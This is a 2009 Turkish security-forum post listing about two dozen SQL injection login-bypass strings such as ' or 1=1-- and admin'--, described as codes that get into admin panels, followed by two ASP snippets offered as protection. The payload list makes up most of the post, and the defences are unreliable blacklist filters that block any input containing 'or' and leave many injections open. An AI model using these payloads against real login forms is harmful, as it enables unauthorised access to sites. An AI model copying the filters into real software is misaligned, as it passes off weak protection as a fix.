Bilgisayar Güvenliği Bilgi Merkezi

bilgisayar,mail,web,site,şifre,network,güvenlik,hack,security,ddökümanları


Bağlı değilsiniz. Bağlanın ya da kayıt olun

Bypass Korunma Yolları

Önceki başlık Sonraki başlık Aşağa gitmek  Mesaj [1 sayfadaki 1 sayfası]

1ikon2 Bypass Korunma Yolları Bir C.tesi Kas. 07, 2009 2:44 pm

Admin

avatar
Admin
Kod:
admin’--
’ or 0=0 --
' or ' 1=1
' or ' 1
' or '
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a
Bunlar SQL Injection İle Panele Giriş Yapan Kodlardır. Eğer Bunları Engellersek SQL İnjectioan Olmuyacaktır.Günümüzde Hala Bu Açıkları Yaratan Webmasterler Mevcut.Kırmızılar Güncel Olarak Kullanabildiklerimiz.

Bunları Zararsız Hale Getirmek İçin 2 Çeşit Yöntem Vardır.

1. Scripte Bu Kodu Yapıştırmak .

Kod:
pass= request.form("pass")
pass = Replace(pass,"’","’’")
pass = Replace(pass,"or","*")
pass = Replace(pass,"=","*")
2. Seçenek Bu En Güzel Kimin Yaptığını Görmek. Bunun İçinde Kod Aşağıdadır.
Kod:
If Instr(pass, "or") Then
Response.Redirect "ban.asp(değiştir.)"
end if


Teknik Destek : cixturk@amasyateknoloji.tk
[Resimleri görebilmek için üye olun veya giriş yapın.]
[Resimleri görebilmek için üye olun veya giriş yapın.]
[Resimleri görebilmek için üye olun veya giriş yapın.]
Kullanıcı profilini gör http://www.hacktebugun.com

Önceki başlık Sonraki başlık Sayfa başına dön  Mesaj [1 sayfadaki 1 sayfası]

Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz